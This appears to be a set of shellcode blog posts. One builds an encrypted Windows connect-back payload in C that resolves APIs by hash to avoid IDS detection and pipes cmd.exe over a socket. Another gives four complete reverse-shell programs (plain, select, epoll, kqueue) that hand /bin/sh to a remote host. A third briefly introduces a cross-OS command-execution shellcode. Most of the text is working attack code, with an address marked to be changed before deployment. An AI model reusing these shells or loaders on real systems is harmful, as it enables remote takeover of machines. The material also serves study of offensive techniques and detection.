A structure is used in my own PIC to emulate a class since most of the functions must be resolved at runtime. This structure is passed to each procedure so that it can access what I’ll refer to in future as global memory.

C or ASM?

Traditionally, shellcodes have always been written in assembly for the target architecture an operating system runs on. As hardware technology advanced over the last 20 years, so did complexity of operating systems and there was also the birth of new languages designed to to be more cost effective for a business. The consequence of these advancements led to fewer and fewer people writing applications in assembly since the hardware no longer suffered limitations of early personal computers.

RAM and ROM space are no longer a factor for the majority of computing devices running an operating system. Compilers are efficient at generating code either optimized for speed or size and high level languages for the most part offer the ability to rapidly develop applications with chance of fewer bugs. Writing assembly today is largely confined to microcomputing devices such as the Atmel AVR 8-bit and 32-bit Microcontrollers.

As someone that’s programmed with both C and ASM on and off for some years now, there was a time when I thought assembly was the only language for writing shellcode. But the kinds of shellcode I was writing back then were very simple and there wasn’t any consideration for information transmitted between two systems being compromised by a third party. So when I decided to try write shellcode that used encryption, i knew there would be a lot of code involved and that it would be a nightmare to debug.

So the codes I wrote in the past were small but this PIC can exceed 5KB once extracted from binary which is something I really wouldn’t want to write by hand, although it’s safe to assume an assembly version is likely to be at least 50% smaller.

For a PIC like this using encryption of packets, it’s certainly doable to implement the entire thing in Assembly but I can imagine it being an unpleasant experience. The purpose of the Asmcodes series was essentially to evaluate potential cryptographic primitives for shellcode.

I think it would be wise to develop a PIC in C first before considering an assembly implementation. Once you’ve ironed out any problems, that will make writing assembly much easier.

Memory layout

A general layout of our global memory is required for data and API addresses. API addresses are likely to consume less space than data so I would recommend placing a structure for API at the very beginning of allocated memory.

For this particular code, we use some (but not all) 28 API which requires 112 bytes on x86 and 224 bytes for x64. I’ll explain later why some are not currently used, it’s mostly for legacy reasons.

They are resolved by 32-bit hash from the PEB (Process Environment Block) that contains among many other things a list of DLL (Dynamic-link Libraries) loaded into our target process.

We identify the variables that will be required to multiple functions and declare these in a structure I’ve simply called v_tbl. (I may need to revise this as some may think it means virtual table)

Pointers to API addresses are stored in a structure call f_tbl and this is then placed inside another structure with v_tbl to define our global memory.

Anyone that’s ever looked at disassembly for a C++ program will notice that each class object or instance of an object is passed to each class method. I’ve adopted a similar approach in C except you can visibly see the parameter passed to each function in source code.

If you’re familiar with object oriented programming, you can view the v_tbl structure as properties of a class and the f_tbl structure as methods. So you might be asking why not just have all memory space in one area? There’s a reason to separate the two and it’s mainly to do with reducing opcode sizes.

In assembly, it would be ideal to store API at start of structure and data variables at end so that we’re accessing the API with the least amount of bytes.

It may be possible to use a free unused or reserved slot in the TEB (Thread Environment Block) or PEB (Process Environment Block) which we can then access from each function through the FS or GS selector depending on version of Windows but I have not investigated this.

Another issue is the use of stack for storing data. cs32.asm and cs64.asm are required to allocate large blocks of stack memory.

As a general rule I would advise you minimize amount of stack allocated to avoid crashing on some systems. In future I will most likely use the heap for global memory instead of stack.

Data structure

The v_tbl represents our variables which are for the most part required by more than one function, but not all. Actually, this could be reduced but it’ll do for now.

// shellcode data structure
typedef struct _sc_v_tbl_t {
  spp_blk             blk;
  SOCKET              s;      // socket
  HANDLE              out1;   // CreateNamedPipe
  HANDLE              in0;    // CreatePipe read
  HANDLE              in1;    // CreatePipe write
  HANDLE              out0;   // CreateFile
  // event handles start here
  HANDLE              evt0;   // WSACreateEvent
  HANDLE              evt1;   // CreateEvent for cmd.exe
  PROCESS_INFORMATION pi;
  DWORD               evt_cnt;
  DWORD               secure;
  HCRYPTPROV          hProv;
  spp_tek             tek;
  aes_ctx             ctx;
} v_tbl;

Code structure

The f_tbl represents our ‘function table’ which is just a structure to hold addresses of each API required by all functions. Even if the application space does not use TCP, the PIC will initialize Windows Sockets before attempting to make an outgoing connection.

// api table structure
typedef struct _sc_f_tbl_t {
  union {
    LPVOID api[28];
    struct {
      // kernel32
      CreateNamedPipe_t                pCreateNamedPipe;
      CreatePipe_t                     pCreatePipe;
      CreateFile_t                     pCreateFile;
      WriteFile_t                      pWriteFile;
      ReadFile_t                       pReadFile;
      GetOverlappedResult_t            pGetOverlappedResult;
      CreateProcess_t                  pCreateProcess;
      TerminateProcess_t               pTerminateProcess;
      CreateEvent_t                    pCreateEvent;
      GetTickCount_t                   pGetTickCount;
      GetLastError_t                   pGetLastError;
      CloseHandle_t                    pCloseHandle;
      WaitForMultipleObjects_t         pWaitForMultipleObjects;
      Wow64DisableWow64FsRedirection_t pWow64DisableWow64FsRedirection;
      GetFileSizeEx_t                  pGetFileSizeEx;
      // ws2_32
      socket_t                         psocket;
      connect_t                        pconnect;
      send_t                           psend;
      recv_t                           precv;
      closesocket_t                    pclosesocket;
      ioctlsocket_t                    pioctlsocket;
      WSAEventSelect_t                 pWSAEventSelect;
      WSAEnumNetworkEvents_t           pWSAEnumNetworkEvents;
      WSACreateEvent_t                 pWSACreateEvent;
      WSAStartup_t                     pWSAStartup;
      // advapi32
      CryptAcquireContextA_t           pCryptAcquireContext;
      CryptGenRandom_t                 pCryptGenRandom;
      CryptReleaseContext_t            pCryptReleaseContext;
    };
  };
} f_tbl;

Both f_tbl and v_tbl are placed in one structure and this represents our global memory.

typedef struct sc_tbl_t {
  f_tbl f; // function table  (code section)
  v_tbl v; // variables table (data section)
} sc_tbl;

Resolving API

A clever and clean way to resolve and invoke an API which is now part of the Metasploit project is originally based on this shellcode for windows which was used for a CTF by some Spanish dudes in July 2008 well before it was modified and added to Metasploit repository.

While it’s a neat way to call API, some IDS software now easily recognize this as being shellcode and so I’ve reverted back to the traditional method of calling API from C using code based on GetProcAddressWithHash.h from Matt Graeber’s PIC_Bindshell which can also support resolving 64-bit API.

The main modification is how hash of DLL is generated and resolving forward references. Instead of using the Unicode string of DLL in PEB, it’s calculated from the DLL header. In addition to this, if we have a forward reference, a new hash for DLL and API is generated before attempting to resolve.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, ofs=0, i, j;
  DWORD                    idx, rva, api_h, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll, p;
  LPVOID                   api_adr=0;
  CHAR                     dll_name[64], api_name[128];
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    // calculate hash of DLL string
    dll_h = api_hash(dll);
    
    do {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // add to DLL hash and compare
      if (api_hash(api)+dll_h == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        // is this a forward reference?
        if ((PBYTE)api_adr >= (PBYTE)exp &&
            (PBYTE)api_adr <  (PBYTE)exp + 
            dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
        {
          DEBUG_PRINT("%08X is forwarded to %s", 
              dwHash, api_adr);
              
          // copy DLL name to buffer
          for (i=0, p=api_adr; p[i] != 0 && 
              i < sizeof(dll_name)-4; i++) 
          {
            dll_name[i] = p[i];
            if (p[i] == '.') break;
          }
          dll_name[i+1] = 'D';
          dll_name[i+2] = 'L';
          dll_name[i+3] = 'L';
          dll_name[i+4] = 0;
          // copy API name to buffer
          for(j=0; p[++i] != 0 && 
              j < sizeof(api_name)-1; j++) 
          { 
            api_name[j] = p[i]; 
          }
          api_name[j] = 0;
          // calculate hash for DLL and API
          dll_h = api_hash(dll_name);
          api_h = api_hash(api_name);
          DEBUG_PRINT("hash for %s and %s = %08X", 
              dll_name, api_name, dll_h + api_h);
          // now try again
          api_adr = getapi(dll_h + api_h);
          // if we don't have at this point, bail out.
        }
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

The initialization resolves a table of API hashes and stores in f_tbl on the stack.

/**F*********************************************
 *
 * entrypoint of PIC
 *
 ************************************************/
#ifdef XALONE
void mainCRTStartup(void)
#else
void entrypoint(void)
#endif
{
  WSADATA            wsa;
  struct sockaddr_in sin;
  sc_tbl             x;
  DWORD              i, cnt;
  int                r;
  char               ws2_32[]={'w','s','2','_','3','2','\0'};
  char               adv_32[]={'a','d','v','a','p','i','3','2','\0'};
  LoadLibrary_t      pLoadLibrary;

  DWORD api_tbl[28] = 
{ // kernel32
  0x9B1D3EA9, 0xE6FA65BF, 0x0BEEEE0C, 0xD7F74F5F,
  0xE0E73F55, 0x5874B33B, 0xB6A0D8D1, 0x09228FC6,
  0xC0F188F0, 0xA7C0D163, 0x2608EFA5, 0x9FEA6E52,
  0xB4682C63, 0xCA1BB2C6, 0x727CC43E,
  // ws2_32
  0x9D920334, 0xB50DF1B2, 0x3DD3116A, 0x3B7B117C,
  0xCE2971AD, 0x424589CE, 0x929726BE, 0x272C063F,
  0x26EF0516, 0xB0E0E991,
  // advapi32
  0x86904799, 0xBD78D522, 0xB635E033 };
  
  // zero initialize memory
  memset ((uint8_t*)&x, 0, sizeof(x));
  
  // load required modules just in case unavailable in PEB
  // get address for LoadlibraryA
  pLoadLibrary=(LoadLibrary_t)getapi(0x7C3B28ED);
  
  // load ws2_32 
  pLoadLibrary(ws2_32);
  
  // load advapi32
  pLoadLibrary(adv_32);
  
  // resolve our api addresses
  for (i=0; i<sizeof(api_tbl)/sizeof(DWORD); i++) {
    x.f.api[i]=getapi(api_tbl[i]);
    if (x.f.api[i] == NULL) {
      DEBUG_PRINT("Critical failure: Unable to resolve API for %08X",
          api_tbl[i]);
      //return;
    }
  }
  
  // initialize winsock
  x.f.pWSAStartup (MAKEWORD(2, 2), &wsa);
  
  // initialize crypto
  x.v.hProv=0;
  
  x.f.pCryptAcquireContext (&x.v.hProv, 
      NULL, NULL, PROV_RSA_AES, 
      CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
      
  // create tcp socket
  x.v.s=x.f.psocket (AF_INET, 
      SOCK_STREAM, IPPROTO_TCP);
      
  // initialize network address, this requires changing before deployment
  sin.sin_port             = HTONS(1234);
  sin.sin_family           = AF_INET;
  sin.sin_addr.S_un.S_addr = 0x0100007F; // 127.0.0.1
  
  // connect to server
  r=x.f.pconnect (x.v.s, 
      (const struct sockaddr*)&sin, sizeof (sin));
  
  if (!r)
  {
    // perform key exchange
    key_xchg(&x);
    // execute dispatcher
    dispatch(&x);
  }
  // close socket
  x.f.pclosesocket (x.v.s);
  // release crypto context
  x.f.pCryptReleaseContext(x.v.hProv, 0);
  
  // cleanup and exit, not used in final code
  //WSACleanup();
  //return 0;
}

API hash algorithm

The api_hash algorithm used in shellcode uses exact same as that found in metasploit except the strings are converted to lowercase before hashing. Although the following works, it is exceptionally slower and delays running shellcode resolving API up to 10 seconds on my system.

// generate sha3-256 hash of dll and api
uint32_t api_hash(char dll[], char api[])
{ 
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX ctx;
  int      i;
  char     c;
  uint8_t  f[64+1]; 
  uint32_t s = 0x9e3779b9UL; // change to something unique
    
  SHA3_Init(&ctx, SHA3_256);         // create 256-bit hash
  SHA3_Update(&ctx, &s, sizeof(s));  // unique secret

  // copy dll converted to lowercase
  for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
    f[i] = (dll[i] | 0x20);
  }
  f[i] = 0;
  SHA3_Update(&ctx, f, i);
  SHA3_Update(&ctx, api, strlen(api));
  SHA3_Final(h.b, &ctx);
  
  // only return the first 32-bits
  return h.w[0];
}

If there’s a way to shorten time require to resolve hashes using SHA-3, I’ll add it later.
Here’s the new getapi function with sha3 hashing included but again it’s too slow.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, ofs=0, idx, rva, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll;
  LPVOID                   api_adr=0;
  
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX                 ctx1, ctx2;
  int                      i;
  uint8_t                  f[64+1]; 
  uint32_t                 s = 0x9e3779b9UL;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    SHA3_Init(&ctx1, SHA3_256);   // create 256-bit hash
    SHA3_Update(&ctx1, &s, sizeof(s));  // unique secret

    // copy dll converted to lowercase
    for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
      f[i] = (dll[i] | 0x20);
    }
    f[i] = 0;
    SHA3_Update(&ctx1, f, i);
  
    do {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // update context with api
      for (i=0; api[i] != 0; i++);
      memcpy ((uint8_t*)&ctx2, (uint8_t*)&ctx1, sizeof(SHA3_CTX));
      SHA3_Update(&ctx2, api, i);
      SHA3_Final(h.b, &ctx2);
      // add to DLL hash and compare
      if (h.w[0] == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

Storing strings

Strings must be stored as character arrays otherwise the compiler will automatically store the string and a pointer to it in the data section which we must avoid for a PIC. For example, this PIC requires socket API from ws2_32.dll and crypto API from advapi32.dll but sometimes these are not already loaded in memory. The PIC will load these 2 libraries before trying to resolve any other API at runtime which requires their names be passed to LoadLibrary API.

char ws2_32[]={'w','s','2','_','3','2','\0'};
char adv_32[]={'a','d','v','a','p','i','3','2','\0'};

CPU intrinsics

Even with /Os flag, sometimes the MSVC compiler will think you’re silly and automatically replace FOR loops with memset or memcpy depending on what the loop does. It’s slightly annoying because if I wanted to use memset or memcpy, I’d use them. Since these are external C library functions, I usually have to replace some FOR loops with intrinsics.

You could of course include your own implementation of memset and memcmp functions which might be a better idea but what I normally do is try using the intrinsic directive which should automatically use STOSB/STOSD for memset, MOVSB/MOVSD for memcpy and CMPSB/CMPSD for memcmp.

#pragma intrinsic(memcmp, memcpy, memset)

However, Microsoft has this to say:

The compiler may call the function and not replace the function call with inline instructions, if it will result in better performance.

If the compiler still doesn’t play ball, I’ll define the following.

#define memcpy(x,y,z) __movsb(x,y,z)
#define memmove(x,y,z) __movsb(x,y,z)
#define memset(x,y,z) __stosb(x,y,z)

This usually fixes the issue but when the compiler is stubborn and refuses to substitute memset/memcpy I replace both C functions with either __stosb or __movsb directly.

If all that fails! Consider using an older version of MSVC or try mingw. I’m using MSVC 2010 and believe MSVC 2013 and later versions have dropped support for replacing memcmp with REP CMPSB even when /Os is used.

Any other problems might be related to bit rotations used for encryption operations although any decent compiler will avoid using SHR/SHL/OR to perform a bit rotation. When it doubt, try using _rotl or _rotr. For byte swapping use _bswap (INTEL compiler) or _byteswap_ulong (MSVC).

Include the following if switching between MSVC or INTEL compiler.

#ifdef _MSC_VER
#include <intrin.h>
#else
#include <x86intrin.h>
#endif

Compiler Flags

The only flags I’ve used attempt to reduce code and omit stack security checking.

@echo off
yasm -fwin32 cs32.asm -ocs32.obj
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- aes.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- sha3.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- modexp.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- -DXALONE spz.c
link /order:@order.txt /base:0 spz.obj sha3.obj aes.obj modexp.obj cs32.obj -subsystem:console -nodefaultlib kernel32.lib -stack:0x100000,0x100000
xbin spz.exe .text
del *.obj

Assembly macros for calculating hashes

Assemblers with macro support provide a way to compute hashes of strings at assembly time. The earliest examples of this were demonstrated in viruses computing CRC hashes of API strings.

The following macro for example is from a virus writer Vecna and based on algorithm originally proposed by LSD-PL in their winasm paper back in 2002.

hash_string macro s
  hash = 0
  len  = 0

  irpc c, <s>
    len = len + 1
  endm
  
  i = 0
  
  irpc c, <s>
    if i ne 0
      if i ne (len-1)
        hash = ((hash shl 7) and 0FFFFFFFFh) or (hash shr (32-7))
        hash = hash xor '&c'
      endif
    endif
    i = i + 1
  endm
endm

An even more clever way to generate MD5 hashes of strings was demonstrated by talented coder drizz. The source of this is too complicated to include here but for those curious, have a look here.

Arithmetic Functions for large integers

The public key cryptography we’re mostly familiar with today use big number libraries to perform computations necessary to protect information.

Most sane people will use a well established cryptography library to do all this but since our PIC can’t depend on any libraries we need to implement our own routines.

But it’s not all bad. In comparison to Elliptic Curve and Lattice based encryption, RSA or Diffie Hellman only uses modular arithmetic which requires large keys but requires the least amount of code. As demonstrated here, a modexp function for x86 can be implemented in 140 bytes!

There’s no Karatsuba or Montgomery multiplication used since our goal is to reduce code much as possible and that means keeping it simple.

See modexp.c for functions that perform Modular Exponentiation.

There’s a paper published in 2007 that discusses an encrypted payload similar to what I discuss here. An Encrypted Payload Protocol and Target-Side Scripting Engine by Dino Dai Zovi describes a payload using RC4 for symmetric encryption and ElGamal for key agreement however no source code for this was ever released.

Dino states the total size of Modular Exponentiation was approx. 1200 bytes which sounds about right if using bit shifting and addition instead of just addition. Remember: shifting left by 1 is the same as multiplying by 2 or simply adding value to itself. πŸ˜‰

Authenticated Encryption

It would appear using AEAD (Authenticated Encryption Associated Data) for packet encryption will become a standard eventually. TLS 1.3 will use only AEAD algorithms and I would expect other protocols to follow suit. Actually, 6 authenticated encryption modes (OCB 2.0, Key Wrap, CCM, EAX, Encrypt-then-MAC (EtM), and GCM) have been standardized in ISO/IEC 19772:2009 although it’s not clear what will be used in future.

The PIC uses an EtM (Encrypt Then MAC) scheme in order to reduce code but I have examined a few of the CAESAR submissions and think Ketje from some of the same authors behind Rijndael and Keccak looks good.

SHA-3 256-bit truncated to 96-bits provides integrity of encrypted packets. The hash is appended to end of 16-byte aligned ciphertext before being transmitted.

On the receiving end, we use the same key to generate MAC and compare with 96-bis we’ve received. If they match, we can presume it was sent by trusted party.

/**F*********************************************
 *
 * Generate MAC of SPP data
 *
 ************************************************/
VOID spp_mac(sc_tbl *x, DWORD inlen, PBYTE out)
{
  SHA3_CTX c;
  BYTE     m[SHA3_256];
  
  SHA3_Init(&c, SHA3_256);                       // initialize
  SHA3_Update(&c, x->v.tek.mkey, SPP_MKEY_LEN);  // add mac key
  SHA3_Update(&c, x->v.blk.buf, inlen);          // add data
  SHA3_Final(m, &c);                             // save
  
  memcpy(out, m, SPP_MAC_LEN);
}

Todo

The PIC client is susceptible to a MitM (Man In The Middle) attack because it does not verify if the public key sent by a server is from a trusted party. We can solve this by signing the public key or simply embedding one within the PIC before deployment avoiding the need to receive one at all.

Summary

Using C or C++ to write PICs that can run on multiple architectures makes more sense than writing each PIC in pure assembly. However, I would point out up to 50-60% of code can be reduced when PIC is written in pure assembly and so it’s not obsolete just yet!

I hope based on sources, more research will be done into using C for writing PICs and that it is more appealing than writing in pure assembly.

See sources here

Posted in assembly, cryptography, diffie hellman merkle, networking, programming, public key exchange, security, shellcode, windows | Tagged , , , , , , , | 1 Comment

Basic shells for Linux and BSD

Introduction

Here are 4 examples of how to spawn a shell on Linux, BSD and Mac OSX for the purpose of accepting commands and sending the output over TCP. I do not use TTY or PTY shells here for this because the intended purpose of the C code was to eventually convert into assembly and for that reason alone, it made sense to keep everything simple.

If you just want to examine code in detail yourself, see here.

Simple reverse connect

The most simple of all which you’ve no doubt seen many times before.

int main(void)
{
    struct sockaddr_in sa;
    u_long      ip=0x0100007F;
    char        *argv[2];
    int         s;
    
    // create a socket
    s=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    
    sa.sin_family = AF_INET;
    sa.sin_port   = htons(1234);
    memcpy (&sa.sin_addr, &ip, sizeof(ip));
    
    // attempt connection to remote host
    connect(s, (struct sockaddr*)&sa, sizeof(sa));
    
    // use socket for input/output
    dup2(s, STDIN_FILENO );
    dup2(s, STDOUT_FILENO);
    dup2(s, STDERR_FILENO);
    
    argv[0]="/bin/sh";
    argv[1]=NULL;
    
    // execute sh
    execve("/bin/sh", argv, NULL);
    
    return 0;
}

The problem with this code is that we can’t manipulate the data transferred between 2 hosts. Smallest code generated, easiest to write but very limited.

select

To solve problem of manipulating data we can use synchronization. The select function is widely available and not that difficult to implement as assembly if we use bit testing instructions.

int main(void)
{
    struct sockaddr_in sa;
    u_long      ip=0x0100007F;
    int         in[2], out[2];
    pid_t       pid;
    char        *pargv[2];
    char        buf[BUFSIZ];
    int         r, s;
    fd_set      fds;
    
    // create pipes for redirection of stdin/stdout/stderr
    pipe(in);
    pipe(out);

    // create /bin/sh as child process
    pid=fork();
    
    if (!pid) {
      dup2( in[0], STDIN_FILENO);
      dup2(out[1], STDOUT_FILENO);
      dup2(out[1], STDERR_FILENO);
      
      close(in[0]);
      close(in[1]);
      
      close(out[0]);
      close(out[1]);
      
      pargv[0]="/bin/sh";
      pargv[1]=NULL;
      
      execve("/bin/sh", pargv, NULL);
    } else {      
      close(in[0]);
      close(out[1]);
      
      // create a socket
      s=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      sa.sin_family = AF_INET;
      sa.sin_port   = htons(1234);
      memcpy (&sa.sin_addr, &ip, sizeof(ip));
      
      // attempt connection to remote host
      connect(s, (struct sockaddr*)&sa, sizeof(sa));
      
      for (;;)
      {
        FD_ZERO(&fds);
        FD_SET(s, &fds);
        FD_SET(out[0], &fds);
        
        r=select(FD_SETSIZE, &fds, 0, 0, 0);
        if (r<0) break;
        
        if (FD_ISSET(s, &fds)) {
          r=read (s, buf, BUFSIZ);
          if (r<=0) break;
          write(in[1], buf, r);
        }
        if (FD_ISSET(out[0], &fds)) {
          r=read (out[0], buf, BUFSIZ);
          if (r<=0) break;
          write(s, buf, r);
        }
      }
      kill(pid, SIGCHLD);
      close(s);
    }
    close(in[1]);
    close(out[0]);
    
    return 0;
}

The problem is that if executed on system with thousands of handles opened, this is unreliable.

epoll

Designed specifically to replace select, we can poll for events on socket or other handles associated with shell.

int main(void)
{
    struct sockaddr_in sa;
    u_long      ip=0x0100007F;
    int         in[2], out[2];
    pid_t       pid;
    char        *pargv[2];
    char        buf[BUFSIZ];
    
    int         efd, end, len, i, r, s, h[2];
    struct      epoll_event evt;
    struct      epoll_event evts[1];
    
    // create pipes for redirection of stdin/stdout/stderr
    pipe(in);
    pipe(out);

    // create /bin/sh as child process
    pid=fork();
    
    if (!pid) {
      dup2( in[0], STDIN_FILENO);
      dup2(out[1], STDOUT_FILENO);
      dup2(out[1], STDERR_FILENO);
      
      close(in[0]);
      close(in[1]);
      
      close(out[0]);
      close(out[1]);
      
      pargv[0]="/bin/sh";
      pargv[1]=NULL;
      
      execve("/bin/sh", pargv, NULL);
    } else {      
      close(in[0]);
      close(out[1]);
      
      // create a socket
      s=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      sa.sin_family = AF_INET;
      sa.sin_port   = htons(1234);
      memcpy (&sa.sin_addr, &ip, sizeof(ip));

      // attempt connection to remote host
      connect(s, (struct sockaddr*)&sa, sizeof(sa));
      
      if ((efd=epoll_create1(0)) > 0)
      {
        h[0] = s;
        h[1] = out[0];
        
        // add 2 descriptors to monitor
        for (i=0; i<2; i++)
        {
          evt.data.fd = h[i];
          evt.events  = EPOLLIN | EPOLLET;
          
          epoll_ctl(efd, EPOLL_CTL_ADD, h[i], &evt);
        }
          
        // now loop until user exits or some other error
        for (end=0; !end;)
        {
          r=epoll_wait(efd, evts, 1, -1);
          
          if (r<0) {
            break;
          }
          
          for (i=0; i<r; i++) 
          {
            // disconnection/error?
            if ((evts[i].events & EPOLLERR) ||
                (evts[i].events & EPOLLHUP)) 
            {
              end=1;
            } else 
            // read is available?
            if (evts[i].events & EPOLLIN) 
            {
              // socket?
              if (evts[i].data.fd == s)
              {
                len=read(s, buf, BUFSIZ);
                write(in[1], buf, len);
              } else {
                // stdout/stderr
                len=read(out[0], buf, BUFSIZ);
                write(s, buf, len);
              }
            }
          }
        }
        close(efd);
      }
      kill(pid, SIGCHLD);
      close(s);
    }
    close(in[1]);
    close(out[0]);
    
    return 0;
}

kqueue on BSD/OSX/

kqueue was originally developed by Jonathan Lemon for FreeBSD in 2000 and has since been ported to other operating systems.

It arrived on the scene before epoll did.

int main(void)
{
    struct sockaddr_in sa;
    u_long      ip=0x0100007F;
    int         in[2], out[2];
    pid_t       pid;
    char        *pargv[2];
    char        buf[BUFSIZ];
    
    int         s, r, i, len, end, kq, nev;
    struct kevent fdlist[2];
    struct kevent evlist[2];
    
    // create pipes for redirection of stdin/stdout/stderr
    pipe(in);
    pipe(out);

    // create /bin/sh as child process
    pid=fork();
    
    if (!pid) {
      dup2( in[0], STDIN_FILENO);
      dup2(out[1], STDOUT_FILENO);
      dup2(out[1], STDERR_FILENO);
      
      close(in[0]);
      close(in[1]);
      
      close(out[0]);
      close(out[1]);
      
      pargv[0]="/bin/sh";
      pargv[1]=NULL;
      
      execve("/bin/sh", pargv, NULL);
    } else {      
      close(in[0]);
      close(out[1]);
      
      // create a socket
      s=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      sa.sin_family = AF_INET;
      sa.sin_port   = htons(1234);
      memcpy (&sa.sin_addr, &ip, sizeof(ip));
      
      // attempt connection to remote host
      connect(s, (struct sockaddr*)&sa, sizeof(sa));
      
      // create new kernel event
      if ((kq = kqueue()) > 0) {
        
        // initialize structure
        EV_SET(&fdlist[0], s, EVFILT_READ, 
            EV_ADD | EV_ENABLE | EV_CLEAR, 0, 0, 0);
            
        EV_SET(&fdlist[1], out[0], EVFILT_READ, 
            EV_ADD | EV_ENABLE | EV_CLEAR, 0, 0, 0);
        
        for (end=0;!end;)
        {
          nev=kevent(kq, fdlist, 2, evlist, 2, NULL);
          
          if (nev > 0)
          {
            if (evlist[0].flags & EV_EOF) break;
            
            for (i=0; i<nev; i++)
            {
              if (evlist[i].flags & EV_ERROR) {
                end=1;
                break;
              }
              if (evlist[i].ident == s)
              {
                len=read(s, buf, BUFSIZ);
                write(in[1], buf, len);
              } else if (evlist[i].ident == out[0])
              {
                len=read(out[0], buf, BUFSIZ);
                write(s, buf, len);
              }
            }
          }
        }
        close(kq);
      }
      kill(pid, SIGCHLD);
      close(s);
    }
    close(in[1]);
    close(out[0]);
    
    return 0;
}

Summary

I haven’t seen any shellcodes that use kqueue, epoll or even select but then maybe they’re not necessary.

Posted in assembly, bsd, linux, networking, openbsd, security, shellcode | Leave a comment

Shellcode: Execute command for x32/x64 Linux / Windows / BSD

Introduction

I was hoping to present here a code that would execute perfectly on 32/64-bit Linux/BSD and Windows systems derived from code discussed here

The 64-bit code will execute on all 3 systems but not 32-bit versions of BSD because the system call convention and numbers are different to 32-bit versions of Linux which could be updated but how many systems still run 32-bit? Less than 10%?

Detection

wos attempts to identify an OS running on x86 using some simple checks of segment registers, stack pointer, errors returned by system calls. It hasn’t been tested extensively but feel free to try out on some x86 based system and tell me what results you get.

It works from Windows NT up to Windows 10, Linux, FreeBSD, OpenBSD, OSX and Solaris x86.

